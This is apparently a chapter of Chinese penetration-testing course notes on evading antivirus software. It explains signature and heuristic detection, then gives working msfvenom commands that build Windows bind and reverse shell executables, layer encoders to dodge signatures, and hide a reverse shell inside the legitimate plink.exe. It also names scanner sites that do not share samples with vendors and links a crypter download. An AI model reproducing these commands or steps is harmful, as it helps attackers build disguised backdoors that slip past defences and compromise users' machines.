第17章 免殺
殺毒軟件
-
叫殺毒軟件變成了防病毒軟件
- 爲什麼叫防病毒軟件
- 應爲做的黑客做出來木馬病毒運行在很底層
- 在開機運行之前木馬病毒就在引導的時候已經啓動了所以殺毒軟件殺不了他
- 企業的防病毒軟件
- 企業的防病毒軟件都有一個單獨的控制檯
- 控制檯就可以控制企業下面的所以設備的安全
- 爲什麼叫防病毒軟件
-
殺毒軟件的原理
- 殺毒軟件的有一個病毒庫,裏面存放着特徵碼
- 基於對二進制的文件或者對數據包進行還原後的裏面的特徵字符進行比較
- 還有行爲分析比如修改你的註冊表,插入進程裏面,修改你的文件等等等方法就叫<啓發式>
免殺技術
- 免殺技術有兩大種
現在還有的黑客進行逆向分析殺毒軟件,看你的殺毒軟件是怎麼進行分析的- 修改
- 如果一個黑客知道那個殺毒軟件的廠商,定義病毒的特點
就可以進行用二進行修改,替換等等等達到免殺技術
- 如果一個黑客知道那個殺毒軟件的廠商,定義病毒的特點
- 2.加密技術(crypter)
- 通過加密使得特徵字符不可讀,來逃避查殺
- 還有叫木馬程序注入到MP3裏面,還照片裏面
- 修改
- FUD是全免殺技術
- 查殺網站
- 下面是明查殺網站,他們會共享給殺毒軟件,進行分享然後在加入特徵庫
https://www.virustotal.com/
http://www.virscan.org/ - 搞黑的
https://nodistribute.com/
http://viruscheckmate.com/check/
- 下面是明查殺網站,他們會共享給殺毒軟件,進行分享然後在加入特徵庫
1.生成木馬
1.生成反彈shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe
-p 選擇一個綁定tcp端口的shell , -a 選擇操作系統的架構
–platform 指定的平臺,win就是windows系統
-f以exe格式輸出 -o輸出成a.exe
-
加密編碼反彈 shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe
raw進行加密編碼 , -e是指定的是x86/shikata_ga_nai模塊
-i 5就是這個x86/shikata_ga_nai模塊加密5次 ,在用管道在用x86/countdown模塊進行8次加密,在用x86/shikata_ga_nai模塊在加密9次
-b 過濾字符
生成
發現加密和不加密的大小一樣,看一下md5是一樣的
用md5sum工具
strings工具可以查看程序可讀的內容
-
查看一下用在線病毒查殺看一下加密和不加密的
在線查殺病毒就是居於特徵碼的,在系統完全安裝殺毒軟件不這個要準確- 查看一下沒有加密的 有49個有25個檢查出了了
- 查看一下加了密的 有49個有25個檢查出了了,效果幾乎一樣
- 查看一下沒有加密的 有49個有25個檢查出了了
2.利用模板隱藏 shell
利用無害的應用程序作爲模板,叫惡意的代碼附着上去
-
利用模板隱藏 shell
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o c.exe
-x 指定一個模板/usr/share/windows-binaries/plink.exe就是kali自帶的win系統的執行程序
其他參數上面說
-
模板隱藏 shell進行加密
msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > d.exe
-
查看一下用在線病毒查殺看一下加密和不加密的
- 查看一下沒有加密的 有49個有21個檢查出了了
- 查看一下加了密的 有49個有21個檢查出了了,效果幾乎一樣
- 查看一下沒有加密的 有49個有21個檢查出了了
3.軟件保護
軟件開發商爲保護版權,採用的混淆和加密技術避免盜版逆向軟件
- Hyperion (32bit PE 程序加密器)工具
他是專門針對32位的PE程序
他有兩個模塊Crypter (加密器)和Container(解密器)
下載地址在有很個個版本:https://github.com/nullsecuritynet/tools/tree/master/binary/hyperion/release